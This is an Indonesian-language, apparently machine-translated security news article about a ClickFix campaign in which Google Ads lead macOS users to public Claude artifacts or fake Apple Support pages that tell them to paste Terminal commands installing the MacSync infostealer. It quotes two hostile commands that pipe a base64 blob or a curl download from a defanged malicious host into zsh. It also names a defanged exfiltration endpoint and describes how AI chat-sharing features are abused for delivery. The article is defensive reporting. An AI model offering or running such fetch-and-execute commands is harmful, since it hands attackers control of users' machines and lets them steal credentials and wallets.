Pelaku ancaman menyalahgunakan artefak Claude dan Google Ads dalam kampanye ClickFix yang mengirimkan malware pencuri info ke pengguna macOS yang mencari kueri tertentu.
Setidaknya dua varian aktivitas berbahaya telah diamati di alam liar, dan lebih dari 10.000 pengguna telah mengakses konten dengan instruksi berbahaya.
Artefak Claude adalah konten yang dibuat dengan LLM Antropic yang dipublikasikan oleh penulis. Itu bisa berupa apa saja mulai dari instruksi, panduan, potongan kode, atau jenis keluaran lainnya yang diisolasi dari obrolan utama dan dapat diakses oleh siapa saja melalui tautan yang dihosting di obrolan utama. claude.ai domain.
Halaman artefak memperingatkan pengguna bahwa konten yang ditampilkan dibuat oleh pengguna dan belum diverifikasi keakuratannya.
Para peneliti di divisi investigasi MacPaw, Moonlock Lab, dan di perusahaan pemblokiran iklan AdGuard memperhatikan hasil pencarian berbahaya yang ditampilkan untuk beberapa pertanyaan, seperti “online DNS solver,” “macOS CLI disk space analyser,” dan “HomeBrew.”
Sumber: AdGuard
Hasil berbahaya yang dipromosikan di Google Penelusuran mengarah ke artefak Claude publik atau artikel Medium yang meniru identitas Dukungan Apple. Dalam kedua kasus tersebut, pengguna diinstruksikan untuk menempelkan perintah shell ke Terminal.
- Pada serangan varian pertama, perintah yang diberikan untuk eksekusi adalah:
‘echo "..." | base64 -D | zsh,’ - sedangkan yang kedua, itu:
‘true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh’.
Sumber: Lab Moonlock
kunci bulan ditemukan peneliti bahwa panduan Claude yang jahat telah dilihat setidaknya 15.600 kali, yang dapat menjadi indikasi jumlah pengguna yang tertipu.
Peneliti AdGuard mengamati panduan yang sama beberapa hari sebelumnya, ketika panduan tersebut dilihat 12.300 kali.
Sumber: Lab Moonlock
Menjalankan perintah di Terminal akan mengambil pemuat malware untuk Pencuri informasi MacSyncyang mengekstraksi informasi sensitif yang ada di sistem.
Menurut para peneliti, malware tersebut membangun komunikasi dengan infrastruktur perintah dan kontrol (C2) menggunakan token hardcode dan kunci API, dan memalsukan agen pengguna browser MacOS untuk berbaur dengan aktivitas normal.
“Responsnya disalurkan langsung ke osascript – AppleScript menangani pencurian sebenarnya (gantungan kunci, data browser, dompet kripto),” kata para peneliti.
Data yang dicuri dikemas ke dalam arsip di ‘/tmp/osalogging.zip,’ dan kemudian dieksfiltrasi ke C2 penyerang di a2abotnet[.]com/gate melalui permintaan HTTP POST. Jika terjadi kegagalan, arsip dipecah menjadi beberapa bagian yang lebih kecil, dan eksfiltrasi dicoba ulang sebanyak delapan kali. Setelah pengunggahan berhasil, langkah pembersihan akan menghapus semua jejak.
MoonLock Lab menemukan bahwa kedua varian mengambil tahap kedua dari alamat C2 yang sama, yang menunjukkan bahwa pelaku ancaman yang sama berada di balik aktivitas yang diamati.
A kampanye serupa memanfaatkan fitur berbagi obrolan di ChatGPT dan Grok untuk menghadirkan pencuri info AMOS. Pada bulan Desember 2025, para peneliti menemukan promosi tersebut setelah peneliti menemukan percakapan ChatGPT dan Grok dimanfaatkan dalam serangan ClickFix yang menargetkan pengguna Mac.
Variasi serangan Claude menunjukkan bahwa penyalahgunaan telah meluas ke model bahasa besar (LLM) lainnya.
Pengguna disarankan untuk berhati-hati dan menghindari mengeksekusi perintah Terminal yang tidak sepenuhnya mereka pahami. Seperti yang dicatat oleh peneliti Kaspersky di masa lalu, menanyakan chatbot dalam percakapan yang sama tentang keamanan perintah yang diberikan adalah cara mudah untuk menentukan apakah perintah tersebut aman atau tidak.
Masa depan infrastruktur TI telah tiba
Infrastruktur TI modern bergerak lebih cepat dibandingkan dengan alur kerja manual.
Dalam panduan Tines baru ini, pelajari bagaimana tim Anda dapat mengurangi penundaan manual yang tersembunyi, meningkatkan keandalan melalui respons otomatis, dan membangun serta menskalakan alur kerja cerdas di atas alat yang sudah Anda gunakan.
